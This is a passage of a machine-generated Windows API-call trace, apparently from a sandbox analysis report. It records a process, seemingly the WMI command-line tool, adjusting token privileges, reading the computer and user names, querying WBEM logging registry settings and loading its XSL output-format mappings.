ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x15fcf0 | out: TokenHandle=0x15fcf0*=0x194) returned 1 [0257.542] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x15fcec | out: TokenInformation=0x0, ReturnLength=0x15fcec) returned 0 [0257.542] malloc (_Size=0x118) returned 0x8726b0 [0257.542] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x8726b0, TokenInformationLength=0x118, ReturnLength=0x15fcec | out: TokenInformation=0x8726b0, ReturnLength=0x15fcec) returned 1 [0257.542] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x8726b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0257.542] free (_Block=0x8726b0) [0257.542] CloseHandle (hObject=0x194) returned 1 [0257.542] malloc (_Size=0x40) returned 0x8726b0 [0257.542] malloc (_Size=0x40) returned 0x8726f8 [0257.542] malloc (_Size=0x40) returned 0x872740 [0257.542] SetThreadUILanguage (LangId=0x0) returned 0x350409 [0257.547] _vsnwprintf (in: _Buffer=0x872740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x15fc78 | out: _Buffer="ms_409") returned 6 [0257.547] malloc (_Size=0x20) returned 0x8711f8 [0257.547] GetComputerNameW (in: lpBuffer=0x8711f8, nSize=0x15fcdc | out: lpBuffer="NQDPDE", nSize=0x15fcdc) returned 1 [0257.547] lstrlenW (lpString="NQDPDE") returned 6 [0257.547] malloc (_Size=0xe) returned 0x872788 [0257.547] lstrlenW (lpString="NQDPDE") returned 6 [0257.547] ResolveDelayLoadedAPI () returned 0x7444db00 [0257.547] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x15fcf0 | out: lpNameBuffer=0x0, nSize=0x15fcf0) returned 0x351000 [0257.549] GetLastError () returned 0xea [0257.549] malloc (_Size=0x1e) returned 0x8727a0 [0257.549] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x8727a0, nSize=0x15fcf0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x15fcf0) returned 0x1 [0257.550] lstrlenW (lpString="") returned 0 [0257.550] lstrlenW (lpString="NQDPDE") returned 6 [0257.550] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0257.552] lstrlenW (lpString=".") returned 1 [0257.552] lstrlenW (lpString="NQDPDE") returned 6 [0257.552] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0257.552] lstrlenW (lpString="LOCALHOST") returned 9 [0257.552] lstrlenW (lpString="NQDPDE") returned 6 [0257.552] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0257.552] lstrlenW (lpString="NQDPDE") returned 6 [0257.552] lstrlenW (lpString="NQDPDE") returned 6 [0257.552] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0257.552] free (_Block=0x872788) [0257.552] lstrlenW (lpString="NQDPDE") returned 6 [0257.552] malloc (_Size=0xe) returned 0x872788 [0257.553] lstrlenW (lpString="NQDPDE") returned 6 [0257.553] lstrlenW (lpString="NQDPDE") returned 6 [0257.553] malloc (_Size=0xe) returned 0x8727c8 [0257.553] lstrlenW (lpString="NQDPDE") returned 6 [0257.553] malloc (_Size=0x4) returned 0x8727e0 [0257.553] malloc (_Size=0xc) returned 0x8727f0 [0257.553] ResolveDelayLoadedAPI () returned 0x7745b870 [0257.564] malloc (_Size=0x18) returned 0x872808 [0257.564] malloc (_Size=0xc) returned 0x872828 [0257.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.564] malloc (_Size=0x18) returned 0x872840 [0257.564] malloc (_Size=0xc) returned 0x872860 [0257.564] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.564] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.564] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.564] malloc (_Size=0x18) returned 0x872878 [0257.564] malloc (_Size=0xc) returned 0x872898 [0257.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.564] malloc (_Size=0x18) returned 0x8728b0 [0257.564] malloc (_Size=0xc) returned 0x8728d0 [0257.564] malloc (_Size=0x18) returned 0x8728e8 [0257.565] malloc (_Size=0xc) returned 0x872908 [0257.565] SysStringLen (param_1="NONE") returned 0x4 [0257.565] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.565] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.565] SysStringLen (param_1="NONE") returned 0x4 [0257.565] malloc (_Size=0x18) returned 0x872920 [0257.565] malloc (_Size=0xc) returned 0x872940 [0257.565] SysStringLen (param_1="CONNECT") returned 0x7 [0257.565] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.565] malloc (_Size=0x18) returned 0x872958 [0257.565] malloc (_Size=0xc) returned 0x8704a0 [0257.566] SysStringLen (param_1="CALL") returned 0x4 [0257.566] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.566] SysStringLen (param_1="CALL") returned 0x4 [0257.566] SysStringLen (param_1="CONNECT") returned 0x7 [0257.566] malloc (_Size=0x18) returned 0x8704b8 [0257.566] malloc (_Size=0xc) returned 0x8704d8 [0257.566] SysStringLen (param_1="PKT") returned 0x3 [0257.566] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.566] SysStringLen (param_1="PKT") returned 0x3 [0257.566] SysStringLen (param_1="NONE") returned 0x4 [0257.566] SysStringLen (param_1="NONE") returned 0x4 [0257.566] SysStringLen (param_1="PKT") returned 0x3 [0257.566] malloc (_Size=0x18) returned 0x872a60 [0257.566] malloc (_Size=0xc) returned 0x8704f0 [0257.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.566] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.566] SysStringLen (param_1="NONE") returned 0x4 [0257.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.566] SysStringLen (param_1="PKT") returned 0x3 [0257.566] SysStringLen (param_1="PKT") returned 0x3 [0257.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.566] malloc (_Size=0x18) returned 0x872ba0 [0257.567] malloc (_Size=0xc) returned 0x870508 [0257.567] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.567] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.567] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.567] SysStringLen (param_1="PKT") returned 0x3 [0257.567] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.567] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.567] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.567] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.567] malloc (_Size=0x18) returned 0x872ca0 [0257.567] malloc (_Size=0x40) returned 0x870520 [0257.567] malloc (_Size=0x20a) returned 0x8797c8 [0257.567] GetSystemDirectoryW (in: lpBuffer=0x8797c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0257.568] free (_Block=0x8797c8) [0257.568] malloc (_Size=0xc) returned 0x870568 [0257.568] malloc (_Size=0xc) returned 0x870580 [0257.568] malloc (_Size=0xc) returned 0x872d80 [0257.568] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0257.568] SysStringLen (param_1="\\wbem\\") returned 0x6 [0257.568] free (_Block=0x870568) [0257.568] free (_Block=0x870580) [0257.568] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0257.568] free (_Block=0x872d80) [0257.568] malloc (_Size=0xc) returned 0x879958 [0257.568] malloc (_Size=0xc) returned 0x879880 [0257.568] malloc (_Size=0xc) returned 0x879898 [0257.568] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0257.568] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0257.569] free (_Block=0x879958) [0257.569] free (_Block=0x879880) [0257.569] GetCurrentThreadId () returned 0x1010 [0257.569] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x15f800 | out: phkResult=0x15f800*=0x1a0) returned 0x0 [0257.569] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x15f80c, lpcbData=0x15f808*=0x400 | out: lpType=0x0, lpData=0x15f80c*=0x30, lpcbData=0x15f808*=0x4) returned 0x0 [0257.569] _wcsicmp (_String1="0", _String2="1") returned -1 [0257.569] _wcsicmp (_String1="0", _String2="2") returned -2 [0257.569] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x15f808*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x15f808*=0x42) returned 0x0 [0257.569] malloc (_Size=0x86) returned 0x872d80 [0257.569] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x872d80, lpcbData=0x15f808*=0x42 | out: lpType=0x0, lpData=0x872d80*=0x25, lpcbData=0x15f808*=0x42) returned 0x0 [0257.569] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.569] malloc (_Size=0x42) returned 0x872e10 [0257.569] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0257.569] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x15f80c, lpcbData=0x15f808*=0x400 | out: lpType=0x0, lpData=0x15f80c*=0x36, lpcbData=0x15f808*=0xc) returned 0x0 [0257.569] _wtol (_String="65536") returned 65536 [0257.570] free (_Block=0x872d80) [0257.570] RegCloseKey (hKey=0x0) returned 0x6 [0257.570] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x15fc9c | out: ppv=0x15fc9c*=0x7745a8) returned 0x0 [0257.595] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x7745a8, xmlSource=0x15fc20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x15fc88 | out: isSuccessful=0x15fc88*=0xffff) returned 0x0 [0257.796] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x7745a8, DOMElement=0x15fc98 | out: DOMElement=0x15fc98*=0x776b48) returned 0x0 [0257.797] malloc (_Size=0xc) returned 0x879910 [0257.798] IXMLDOMElement:getElementsByTagName (in: This=0x776b48, tagName="XSLFORMAT", resultList=0x15fc94 | out: resultList=0x15fc94*=0x779ca0) returned 0x0 [0257.799] free (_Block=0x879910) [0257.799] IXMLDOMNodeList:get_length (in: This=0x779ca0, listLength=0x15fc90 | out: listLength=0x15fc90*=21) returned 0x0 [0257.799] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=0, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.800] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.800] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.800] malloc (_Size=0xc) returned 0x879808 [0257.800] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.801] free (_Block=0x879808) [0257.801] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0257.801] malloc (_Size=0xc) returned 0x879928 [0257.801] malloc (_Size=0xc) returned 0x879808 [0257.801] malloc (_Size=0x18) returned 0x872d00 [0257.802] IUnknown:Release (This=0x776b88) returned 0x0 [0257.802] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.802] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.802] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=1, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.802] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="textvaluelist.xsl") returned 0x0 [0257.802] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.802] malloc (_Size=0xc) returned 0x879880 [0257.802] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.803] free (_Block=0x879880) [0257.803] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0257.803] malloc (_Size=0xc) returned 0x8798b0 [0257.803] malloc (_Size=0xc) returned 0x8797f0 [0257.803] SysStringLen (param_1="VALUE") returned 0x5 [0257.803] SysStringLen (param_1="TABLE") returned 0x5 [0257.803] SysStringLen (param_1="TABLE") returned 0x5 [0257.803] SysStringLen (param_1="VALUE") returned 0x5 [0257.803] malloc (_Size=0x18) returned 0x872c80 [0257.803] IUnknown:Release (This=0x776b88) returned 0x0 [0257.803] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.803] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.803] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=2, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.803] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="textvaluelist.xsl") returned 0x0 [0257.804] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.804] malloc (_Size=0xc) returned 0x8798e0 [0257.804] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.804] free (_Block=0x8798e0) [0257.804] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0257.804] malloc (_Size=0xc) returned 0x879820 [0257.804] malloc (_Size=0xc) returned 0x8798e0 [0257.804] SysStringLen (param_1="LIST") returned 0x4 [0257.804] SysStringLen (param_1="TABLE") returned 0x5 [0257.804] malloc (_Size=0x18) returned 0x872bc0 [0257.804] IUnknown:Release (This=0x776b88) returned 0x0 [0257.804] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.804] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.804] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=3, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.805] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="rawxml.xsl") returned 0x0 [0257.805] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.805] malloc (_Size=0xc) returned 0x8798c8 [0257.805] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.805] free (_Block=0x8798c8) [0257.805] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0257.805] malloc (_Size=0xc) returned 0x879970 [0257.805] malloc (_Size=0xc) returned 0x879988 [0257.805] SysStringLen (param_1="RAWXML") returned 0x6 [0257.805] SysStringLen (param_1="TABLE") returned 0x5 [0257.805] SysStringLen (param_1="RAWXML") returned 0x6 [0257.805] SysStringLen (param_1="LIST") returned 0x4 [0257.806] SysStringLen (param_1="LIST") returned 0x4 [0257.806] SysStringLen (param_1="RAWXML") returned 0x6 [0257.806] malloc (_Size=0x18) returned 0x872d60 [0257.806] IUnknown:Release (This=0x776b88) returned 0x0 [0257.806] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.806] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.806] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=4, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.806] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="htable.xsl") returned 0x0 [0257.806] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.806] malloc (_Size=0xc) returned 0x879850 [0257.806] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.806] free (_Block=0x879850) [0257.807] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0257.807] malloc (_Size=0xc) returned 0x879940 [0257.807] malloc (_Size=0xc) returned 0x879838 [0257.807] SysStringLen (param_1="HTABLE") returned 0x6 [0257.807] SysStringLen (param_1="TABLE") returned 0x5 [0257.807] SysStringLen (param_1="HTABLE") returned 0x6 [0257.807] SysStringLen (param_1="LIST") returned 0x4 [0257.807] malloc (_Size=0x18) returned 0x872aa0 [0257.807] IUnknown:Release (This=0x776b88) returned 0x0 [0257.807] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.807] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.807] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=5, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.807] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="hform.xsl") returned 0x0 [0257.807] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.807] malloc (_Size=0xc) returned 0x8798f8 [0257.808] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.808] free (_Block=0x8798f8) [0257.808] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0257.808] malloc (_Size=0xc) returned 0x879910 [0257.808] malloc (_Size=0xc) returned 0x8799a0 [0257.808] SysStringLen (param_1="HFORM") returned 0x5 [0257.808] SysStringLen (param_1="TABLE") returned 0x5 [0257.808] SysStringLen (param_1="HFORM") returned 0x5 [0257.808] SysStringLen (param_1="LIST") returned 0x4 [0257.808] SysStringLen (param_1="HFORM") returned 0x5 [0257.808] SysStringLen (param_1="HTABLE") returned 0x6 [0257.808] malloc (_Size=0x18) returned 0x872d20 [0257.808] IUnknown:Release (This=0x776b88) returned 0x0 [0257.808] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.808] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.808] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=6, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.809] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="xml.xsl") returned 0x0 [0257.809] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.809] malloc (_Size=0xc) returned 0x8799b8 [0257.809] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.809] free (_Block=0x8799b8) [0257.809] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0257.809] malloc (_Size=0xc) returned 0x8798c8 [0257.809] malloc (_Size=0xc) returned 0x8798f8 [0257.809] SysStringLen (param_1="XML") returned 0x3 [0257.809] SysStringLen (param_1="TABLE") returned 0x5 [0257.809] SysStringLen (param_1="XML") returned 0x3 [0257.809] SysStringLen (param_1="VALUE") returned 0x5 [0257.809] SysStringLen (param_1="VALUE") returned 0x5 [0257.809] SysStringLen (param_1="XML") returned 0x3 [0257.809] malloc (_Size=0x18) returned 0x872cc0 [0257.810] IUnknown:Release (This=0x776b88) returned 0x0 [0257.810] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.810] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.810] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=7, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.810] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="mof.xsl") returned 0x0 [0257.810] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.810] malloc (_Size=0xc) returned 0x879850 [0257.810] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.810] free (_Block=0x879850) [0257.810] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0257.810] malloc (_Size=0xc) returned 0x8799b8 [0257.811] malloc (_Size=0xc) returned 0x879850 [0257.811] SysStringLen (param_1="MOF") returned 0x3 [0257.811] SysStringLen (param_1="TABLE") returned 0x5 [0257.811] SysStringLen (param_1="MOF") returned 0x3 [0257.811] SysStringLen (param_1="LIST") returned 0x4 [0257.811] SysStringLen (param_1="MOF") returned 0x3 [0257.811] SysStringLen (param_1="RAWXML") returned 0x6 [0257.811] SysStringLen (param_1="LIST") returned 0x4 [0257.811] SysStringLen (param_1="MOF") returned 0x3 [0257.811] malloc (_Size=0x18) returned 0x872ac0 [0257.811] IUnknown:Release (This=0x776b88) returned 0x0 [0257.811] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.811] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.811] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=8, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.811] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="csv.xsl") returned 0x0 [0257.811] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.812] malloc (_Size=0xc) returned 0x879958 [0257.812] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.812] free (_Block=0x879958) [0257.812] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0257.812] malloc (_Size=0xc) returned 0x879868 [0257.812] malloc (_Size=0xc) returned 0x879958 [0257.812] SysStringLen (param_1="CSV") returned 0x3 [0257.812] SysStringLen (param_1="TABLE") returned 0x5 [0257.812] SysStringLen (param_1="CSV") returned 0x3 [0257.812] SysStringLen (param_1="LIST") returned 0x4 [0257.812] SysStringLen (param_1="CSV") returned 0x3 [0257.812] SysStringLen (param_1="HTABLE") returned 0x6 [0257.812] SysStringLen (param_1="CSV") returned 0x3 [0257.812] SysStringLen (param_1="HFORM") returned 0x5 [0257.812] malloc (_Size=0x18) returned 0x872a00 [0257.812] IUnknown:Release (This=0x776b88) returned 0x0 [0257.813] IUnknown:Release (This=0x779fa8) returned 0x0 [0257.813] IUnknown:Release (This=0x779ff8) returned 0x0 [0257.813] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=9, listItem=0x15fcb0 | out: listItem=0x15fcb0*=0x776b88) returned 0x0 [0257.813] IXMLDOMNode:get_text (in: This=0x776b88, text=0x15fcb4 | out: text=0x15fcb4*="texttable.xsl") returned 0x0 [0257.813] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x15fcac | out: attributeMap=0x15fcac*=0x779fa8) returned 0x0 [0257.813] malloc (_Size=0xc) returned 0x879880 [0257.813] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x15fca8 | out: namedItem=0x15fca8*=0x779ff8) returned 0x0 [0257.813] free (_Block=0x879880) [0257.813] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x15fc68 | out: value=0x15fc68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0257.813] malloc (_Size=0xc) returned 0x879880 [0257.813] malloc (_Size=0xc) returned 0x87ae28 [0257.814] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.814] SysStringLen (param_1="TABLE") returned 0x5 [0257.814] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.814] SysStringLen (param_1="VALUE") returned 0x5 [0257.814] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0257.814] SysStringLen 